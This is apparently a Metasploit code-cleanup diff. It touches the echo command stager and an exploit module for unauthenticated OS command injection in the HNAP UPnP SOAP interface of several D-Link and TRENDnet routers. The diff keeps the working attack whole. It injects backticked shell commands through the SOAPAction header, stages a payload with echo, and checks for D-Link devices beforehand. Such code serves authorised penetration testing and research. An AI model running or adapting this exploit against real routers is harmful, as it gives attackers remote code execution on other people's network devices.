Do code cleanup

Author: jvazquez-r7

lib/rex/exploitation/cmdstager/echo.rb

@@ -26,11 +26,10 @@ def initialize(exe)
   # and initialize opts[:enc_format].
   #
   def generate(opts = {})
-    if opts[:temp] == false
-      opts[:temp] = ''
-    else
-      opts[:temp] = opts[:temp] || '/tmp/'
-      opts[:temp].gsub!(/\\/, "/")
+    opts[:temp] = opts[:temp] || '/tmp/'
+
+    unless opts[:temp].empty?
+      opts[:temp].gsub!(/\\/, '/')
       opts[:temp] = opts[:temp].shellescape
       opts[:temp] << '/' if opts[:temp][-1,1] != '/'
     end

modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb

@@ -18,9 +18,9 @@ def initialize(info = {})
         Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
         interface. Since it is a blind OS command injection vulnerability, there is no
         output for the executed command. This module has been tested on a DIR-645 device.
-        The following devices are also reported as affected:
-        DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB
-        DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
+        The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
+        DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
+        DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
       },
       'Author'      =>
         [
@@ -36,21 +36,19 @@ def initialize(info = {})
         ],
       'DisclosureDate' => 'Feb 13 2015',
       'Privileged'     => true,
-      'Platform'       => 'unix',
+      'Platform'       => 'linux',
       'Targets' =>
         [
           [ 'MIPS Little Endian',
             {
-              'Platform' => 'linux',
               'Arch'     => ARCH_MIPSLE
             }
           ],
           [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
             {
-              'Platform' => 'linux',
               'Arch'     => ARCH_MIPSBE
             }
-          ],
+          ]
         ],
       'DefaultTarget'    => 0
       ))
@@ -60,16 +58,17 @@ def initialize(info = {})
 
   def check
     uri = '/HNAP1/'
-    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings"
+    soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
 
     begin
       res = send_request_cgi({
         'uri'    => uri,
         'method' => 'GET',
         'headers' => {
-          'SOAPAction' => soapaction,
-          },
+          'SOAPAction' => soap_action,
+          }
       })
+
       if res && [200].include?(res.code) && res.body =~ /D-Link/
         return Exploit::CheckCode::Detected
       end
@@ -92,26 +91,25 @@ def exploit
     execute_cmdstager(
       :flavor  => :echo,
       :linemax => 200,
-      :temp    => false
+      :temp    => ''
     )
-
   end
 
   def execute_command(cmd, opts)
 
     uri = '/HNAP1/'
 
-    cmd_new = "cd && cd tmp && export PATH=$PATH:. && " << cmd
-    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
+    cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
+    soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
 
     begin
       res = send_request_cgi({
         'uri'    => uri,
         'method' => 'GET',
         'headers' => {
-          'SOAPAction' => soapaction,
-          },
-      },1)
+          'SOAPAction' => soap_action,
+          }
+      }, 3)
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end